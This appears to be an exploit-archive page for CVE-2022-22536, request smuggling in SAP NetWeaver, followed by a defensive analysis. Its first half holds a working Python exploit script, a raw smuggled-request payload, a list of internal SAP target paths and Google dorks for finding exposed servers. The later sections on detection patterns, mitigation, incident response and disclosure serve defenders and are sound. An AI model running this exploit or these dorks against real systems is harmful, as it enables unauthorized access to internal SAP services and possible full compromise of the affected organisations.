SAP NetWeaver - 7.53 - HTTP Request Smuggling
Exploit Author: C41Tx90 Analysis Author: www.bubbleslearn.ir Category: Remote Language: Unknown Published Date: 2025-04-02
# Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door
# Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks
# Date: Tuesday, April 2, 2025
# Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron Security
# Vendor Homepage: https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request smuggling-and-request-concatenation/ba-p/13528083
# Software Link: https://help.sap.com/docs/SUPPORT_CONTENT/uiwits/3361892375.html
# Version: SAP NetWeaver Application Server ABAP, SAP NetWeaver
Application Server Java, ABAP Platform, SAP Content Server 7.53 and
SAP Web Dispatcher
# Tested on: Red Hat Enterprise Linux (RHEL)
# CVE : 2022-22536
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
------
SAPGateBreaker - CVE-2022-22536 HTTP Request Smuggler
Author: @C41Tx90 - Victor de Queiroz | elytronsecurity.com |
becodoexploit.com
----------------------------------------------------------------------------
Target: SAP NetWeaver Application Server
Vulnerability: CVE-2022-22536
Exploit Type: HTTP Request Smuggling (Content-Length-based)
Impact: ACL Bypass, Internal Access
More information and explanations:
https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit
----------------------------------------------------------------------------
Sample Payload:
----------------------------------------------------------------------------
GET /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0)
Gecko/20100101 Firefox/136.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.32.22.7:50000/sap/admin/public/default.html
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Cookie: saplb_*=(J2EE7364720)7364750
Authorization: Basic YTph
Content-Length: 89
0\r
\r
GET /heapdump/ HTTP/1.1\r
Host: 127.0.0.1\r
X-Forwarded-For: 127.0.0.1\r
\r
----------------------------------------------------------------------------
Expected Response:
----------------------------------------------------------------------------
HTTP/1.1 200 OK
server: SAP NetWeaver Application Server
last-modified: Tue, 01 Sep 2020 11:54:39 GMT
sap-cache-control: +3600
date: Tue, 01 Apr 2025 20:49:02 GMT
content-length: 4465
content-type: text/html
connection: Keep-Alive
x-dummy: 0
----------------------------------------------------------------------------
Indicators of Success:
- Status code 200 for internal endpoints
- Difference between direct access (403/404) and smuggled (200)
- Access to otherwise restricted SAP services via loopback injection
----------------------------------------------------------------------------
Example Paths Tested:
- /sap/public/bc/icf/info
- /sap/bc/webdynpro/sap/appl_soap_management
- /heapdump/
- /ctc/ConfigServlet
- /sap/public/bc/icf/logon.html
- /webdynpro/resources/sap.com/tc~lm~config~content/
----------------------------------------------------------------------------
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
Google Dorks:
intitle:"SAP NetWeaver Application Server Java" inurl:/webdynpro/resources/
intitle:"SAP NetWeaver" "SAP J2EE Engine"
intitle:"Welcome to SAP NetWeaver" inurl:/irj/portal
intitle:"SAP NetWeaver Administrator" inurl:/nwa
inurl:"/sap/bc/webdynpro" -site:sap.com
inurl:"/sap/public" "SAP NetWeaver"
inurl:"/sap/admin/public/default.html"
inurl:"/webdynpro/welcome/Welcome.html"
inurl:"/sap/public/info.jsp"
"Powered by SAP NetWeaver" inurl:sap
intitle:"SAP Web Dispatcher Administration"
----------------------------------------------------------------------------
# Exploit
import argparse
import http.client
from urllib.parse import urlparse
from colorama import Fore, Style, Back, init
import os
init(autoreset=True)
BANNER = f"""
{Fore.WHITE}
+---------------------------+
(\__/\ Breaking the Gate |
{Style.BRIGHT}{Fore.WHITE}by{Style.RESET_ALL}
{Fore.YELLOW}@C41Tx90{Fore.WHITE} |
({Fore.RED}•{Fore.WHITE}デ{Fore.RED}•{Fore.WHITE})
{Style.BRIGHT}{Fore.YELLOW} CVE-2022-22536{Style.RESET_ALL} |
{Fore.GREEN}t.me/becodoxpl{Fore.WHITE} |
/ つ {Fore.WHITE}HTTP Request Smuggler |
{Fore.YELLOW}becodoexploit.com{Fore.WHITE} |
|
{Fore.LIGHTBLUE_EX}elytronsecurity.com{Fore.WHITE} |
+---------------------------+
"""
def detect_sap_version(host, port, is_https):
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port, timeout=5)
conn.request("GET", "/")
res = conn.getresponse()
headers = {k.lower(): v for k, v in res.getheaders()}
server_header = headers.get("server", "Unknown")
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Detected SAP Server
Header: {Fore.CYAN}{server_header}\n")
return server_header
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Could not determine SAP
version: {e}\n")
return "Unknown"
def build_smuggled_request(path):
return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost:
127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
def try_file_read(host, port, is_https, verbose):
test_paths = [
"/sap/public/bc/icf/info",
"/sap/public/info.jsp",
"/sap/public/test/test.jsp",
"/sap/bc/webdynpro/sap/appl_soap_management",
"/sap/public/bc/soap/rfc",
"/webdynpro/welcome/Welcome.html",
"/sr_central",
"/useradmin/.jsp",
"/heapdump/",
"/startPage",
"/crossdomain.xml",
"/ctc/ConfigServlet",
"/webdynpro/resources/sap.com/tc~lm~config~content/",
"/sld",
"/sap/bc/webdynpro/sap/wdy_cfg_component_config",
"/sap/public/bc/icf/logon.html",
"/sap/bc/webdynpro/sap/itadmin",
"/sap/public/bc/sec/saml2",
"/sap/public/bc/webdav"
]
print(f"{Style.BRIGHT}{Fore.RED}[!] {Fore.WHITE}Proof of Concept
for ACL Bypass via HTTP Request Smuggling{Style.RESET_ALL}\n")
for path in test_paths:
try:
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
conn.request("GET", path)
res_direct = conn.getresponse()
content_direct = res_direct.read().decode(errors="ignore")
direct_status = res_direct.status
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error checking direct
access for {path}: {e}")
continue
body = build_smuggled_request(path)
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
try:
conn = conn_class(host, port)
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
smuggled_headers = res.getheaders()
content_smuggled = res.read().decode(errors="ignore")
smuggled_status = res.status
status_color = Fore.GREEN if smuggled_status !=
direct_status else Fore.RED
print(f"{status_color}[-] {Fore.LIGHTBLUE_EX}{path}
{Style.BRIGHT}{Fore.WHITE}Direct Access:
{Fore.YELLOW}({direct_status}) {Fore.WHITE}Smuggled Access:
{status_color}({smuggled_status}){Style.RESET_ALL}")
if smuggled_status == direct_status:
print(f"{Fore.RED}[x] {Fore.WHITE}Exploit did not work
for {path}\n")
with open("poc.txt", "a") as f:
f.write(f"\n--- Path: {path} ---\n")
f.write(f"Direct: {direct_status}\nSmuggled:
{smuggled_status}\n")
f.write(f"Smuggled Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Smuggled Response Headers:\n")
for h in smuggled_headers:
f.write(f"{h[0]}: {h[1]}\n")
if verbose:
f.write(f"\nSmuggled Response Body:\n{content_smuggled}\n")
f.write(f"\nDirect Response:\n{content_direct}\n")
if verbose:
print(f"\n{Fore.BLUE}>>> Sent Payload to
{path}:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST
/sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if smuggled_status == 500
else Fore.CYAN}{Fore.WHITE}HTTP/1.1
{smuggled_status}{Style.RESET_ALL}")
for h in smuggled_headers:
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
print(f"\n{Fore.CYAN}{content_smuggled}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error smuggling to {path}: {e}")
def send_smuggled_request(target, verbose):
parsed = urlparse(target)
is_https = parsed.scheme == 'https'
port = parsed.port or (443 if is_https else 80)
host = parsed.hostname
print(BANNER)
print(f"{Fore.YELLOW}[*] {Fore.WHITE}Starting CVE-2022-22536
exploitation on {host}:{port}\n")
detect_sap_version(host, port, is_https)
body = build_smuggled_request("/sap/bc/webdynpro/sap/appl_soap_management")
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
conn_class = http.client.HTTPSConnection if is_https else
http.client.HTTPConnection
conn = conn_class(host, port)
try:
conn.request("POST", "/sap/admin/public/default.html",
body=body, headers=headers)
res = conn.getresponse()
content = res.read().decode(errors="ignore")
status_display = f"HTTP/{res.version/10:.1f} {res.status} {res.reason}"
is_exploit_success = res.status in [200, 500, 403, 302]
print(f"{Fore.GREEN if is_exploit_success else Fore.RED}[-]
{Fore.WHITE}Exploit executed{' successfully' if is_exploit_success
else ''}! {Fore.YELLOW}CVE-2022-22536")
print(f"{Fore.WHITE}{'-'*60}\n")
print(f"{Fore.BLUE}>>> Sent Payload:{Style.RESET_ALL}")
print(f"{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1")
for k, v in headers.items():
print(f"{Fore.CYAN}{k}: {v}")
print(f"\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n")
print(f"{Fore.BLUE}>>> Received Response:{Style.RESET_ALL}")
print(f"{Back.YELLOW if res.status == 500 else
Fore.CYAN}{Fore.WHITE}{status_display}{Style.RESET_ALL}")
for h in res.getheaders():
print(f"{Fore.CYAN}{h[0]}: {h[1]}")
if verbose:
print(f"\n{Fore.CYAN}{content}{Style.RESET_ALL}")
with open("poc.txt", "w") as f:
f.write(f"Initial Request:\nPOST
/sap/admin/public/default.html HTTP/1.1\n")
for k, v in headers.items():
f.write(f"{k}: {v}\n")
f.write(f"\n{body}\n")
f.write(f"Initial Response:\n{status_display}\n")
for h in res.getheaders():
f.write(f"{h[0]}: {h[1]}\n")
f.write(f"\n{content}\n")
print("\n")
if is_exploit_success:
print(f"{Fore.GREEN}[=] {Fore.WHITE}The exploit executed
successfully and triggered an internal processing behavior. This
indicates a potential HTTP request smuggling condition.")
else:
print(f"{Fore.RED}[x] {Fore.WHITE}The exploit did not
trigger the expected behavior. Target may not be vulnerable.")
print(f"\n{Fore.WHITE}{'-'*60}\n")
try_file_read(host, port, is_https, verbose)
except Exception as e:
print(f"{Fore.RED}[!] {Fore.WHITE}Error sending initial request: {e}")
def main():
parser = argparse.ArgumentParser(description="CVE-2022-22536 Smuggling PoC")
parser.add_argument("-u", "--url", required=True, help="Target
full URL (e.g., http://host:port)")
parser.add_argument("--verbose", "-v", action="store_true",
help="Show full headers and responses")
args = parser.parse_args()
os.system('clear')
send_smuggled_request(args.url, args.verbose)
if __name__ == "__main__":
main()
----------------------------------------------------------------------------
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
https://launchpad.support.sap.com/#/notes/3123396
https://blogs.sap.com/2022/02/08/patch-your-sap-netweaver-application-server-asap-cve-2022-22536/SAP NetWeaver 7.53 — HTTP Request Smuggling (CVE-2022-22536)
Summary: CVE-2022-22536 is a request-smuggling and request-concatenation vulnerability affecting SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher. An unauthenticated remote attacker can craft requests that are parsed differently by front-end proxies and back-end servers, allowing an attacker to prepend or inject requests that the back-end will process in the context of another client. The result can include ACL bypass, access to internal-only endpoints, cache poisoning, and wider compromise of confidentiality, integrity and availability.
What is HTTP request smuggling? (high-level)
HTTP request smuggling arises when two HTTP parsers (for example, a load balancer or proxy and the origin server) disagree about the boundaries between consecutive HTTP requests. The disagreement may be caused by inconsistent handling of headers such as Content-Length and Transfer-Encoding, or by incorrect handling of chunked encoding. An attacker uses that mismatch to slip an extra (smuggled) request through the front-end into the back-end’s request stream.
Affected components and impact
- Affected: SAP NetWeaver Application Server (ABAP/Java) and SAP Web Dispatcher as documented by SAP (versions up to the 7.53 family at time of disclosure).
- Impact: unauthenticated attacker can cause the back-end to execute requests on internal addresses, access restricted endpoints, poison intermediary caches, and potentially escalate to broader system compromise depending on what internal endpoints expose.
- Reference: vendor advisory and SAP Security Notes provide patch details and remediation guidance.
How the attack works — conceptual (non-actionable)
Below is a conceptual, sanitized illustration of the core idea. This is intentionally high-level and non-executable — do not use this in public scanning or to attempt exploitation. It is shown only to explain the mechanics so defenders can detect and mitigate.
Client -> Front-end proxy
Sends a request whose body contains data that will be interpreted by
the front-end as a body, but interpreted by the back-end as the start
of a fresh request. The URI, Host, or X‑Forwarded‑For fields inside
the injected payload are typically used to target internal services.
Front-end parser: sees "Content-Length: N" and treats the embedded bytes as request body.
Back-end parser: interprets a boundary earlier and parses an embedded request like:
GET /internal/endpoint HTTP/1.1
Host: 127.0.0.1
(headers...)
Explanation: Two parsers disagree on where one request ends and the next begins. That disagreement allows an attacker to place a second HTTP request payload ("the smuggled request") into the stream. If the back-end processes it with a victim’s connection context, the attacker can trigger actions not normally available to unauthenticated external clients.
Indicators of compromise (what to look for)
- Unexpected 200 responses from internal-only endpoints that normally return 403/404 when accessed remotely.
- Log entries showing unusual request text embedded within another request, or lines containing control sequences or unexpected HTTP method tokens.
- Discrepancies between a client’s direct request results and results received when requests pass through intermediaries (e.g., proxy vs direct).
- Proxy or back-end logs with anomalies around Content-Length, Transfer-Encoding or sudden truncation/concatenation of requests.
Sample detection patterns (defensive, non-actionable)
The following examples are only detection heuristics for logs; they are not exploit code. Tailor and test rules in a safe environment before deployment.
# Simple log pattern: look for literal request fragments embedded in request bodies
# (pseudo-regex; adapt to your logging format and escaping rules)
regex_embedded_http = r"(GET|POST|PUT|DELETE)\s+\/\S+\s+HTTP\/1\.\d"
# Suspicious chunk/length boundary pattern in raw request data
regex_boundary = r"0\\r\\n\\r\\n.*(GET|POST)\\s+\\/"
# Example IDS signature (conceptual)
if request.body matches regex_embedded_http and request.remote_addr is external:
flag_suspicious("possible smuggled request fragment")
Explanation: The detection patterns search for HTTP method tokens appearing inside bodies or unexpected HTTP token sequences after a suspected end-of-body marker. These are intended for defenders to spot smuggling attempts by analyzing raw proxy and backend logs.
Mitigation and remediation
Mitigation must be layered: patch vulnerable software and harden the HTTP handling chain.
- Apply vendor patches immediately. SAP published security notes and fixes to address CVE-2022-22536. Use SAP Support and notes (search for the relevant SAP Note number in your environment) and the official patch list to upgrade NetWeaver components and SAP Web Dispatcher to versions that include the fix.
- Canonicalize header processing across the chain. Ensure proxies/load-balancers and application servers use consistent parsing rules for Content-Length and Transfer-Encoding—prefer a single authoritative parser when possible.
- Reject ambiguous requests. Configure front-end proxies and WAFs to reject requests containing both Transfer-Encoding and Content-Length headers, or otherwise disallow ambiguous combinations.
- WAF and proxy rules. Deploy WAF rules to detect and block request-body content that contains embedded HTTP methods or internal hostnames. Use strict request validation to reject suspicious patterns.
- Network segmentation. Limit direct access from front-end tiers to sensitive internal services (e.g., 127.0.0.1-only endpoints) using firewall rules and service-level ACLs.
- Logging and monitoring. Enable and centralize detailed HTTP access logs (including raw request lines and headers where feasible), and alert on the detection heuristics described above.
- Disable unnecessary endpoints. Identify and disable or restrict internal debug or management endpoints (heapdump, diagnostic consoles) that an attacker might target via smuggling.
Validating fixes safely
- Validate in an isolated test/lab environment that mirrors production, never run active exploit code on production systems.
- Use vendor-provided verification steps (SAP Notes often include guidance on post-patch checks) and compare server version headers or product build numbers before/after update.
- Perform non-destructive tests such as checking that ambiguous header combinations are rejected by the front-end and not forwarded to back-ends. Do this with approved test tools and only against environments you own or have explicit permission to test.
Incident response guidance
- If you discover evidence of successful request smuggling, isolate affected systems and collect full HTTP proxy and application logs for the time window of interest.
- Review internal access logs for signs of unusual operations (configuration changes, endpoint access that should be internal-only, data exfiltration attempts).
- Rotate credentials and certificates if there is suspicion of credential compromise. Audit privileged accounts and remote access tokens.
- Engage SAP Support for coordinated remediation and follow vendor recommendations for deep forensic analysis if internal systems were accessed.
Hardening checklist (quick reference)
| Action | Reason |
|---|---|
| Apply SAP security notes/patches | Fixes the parsing logic and known vulnerability patterns |
| Harden proxy parsing rules | Prevents ambiguous header combinations and enforces canonicalization |
| Enable WAF rules for embedded HTTP tokens | Blocks many smuggling attempts at the edge |
| Segregate management/internal endpoints | Reduces blast radius if a smuggling attempt reaches back-end |
| Centralized logging and detection | Enables faster detection of anomalous request patterns |
Safe testing and responsible disclosure
Always perform security testing only on systems you own or have explicit authorization to test. Exploiting vulnerabilities on third-party systems is illegal and unethical. If you discover an unpatched instance in the wild, follow coordinated disclosure procedures: notify the vendor (SAP) and affected owners, provide reproducible defensive evidence (logs and timestamps), and share remediation details only with authorized parties until fixes are available.
References and further reading
- NVD — CVE-2022-22536 (vulnerability metadata)
- SAP Security Note / Patch Information (search relevant support note IDs via SAP Support Portal)
- SAP community blog — remediation guidance
Final note: Request smuggling remains a high-risk class of vulnerability because it exploits systemic differences in protocol parsing rather than a single coding error. The most effective defenses combine timely patching, consistent parsing policies across the HTTP chain, strict input validation at the edge, and rapid detection of anomalous traffic or internal endpoint access.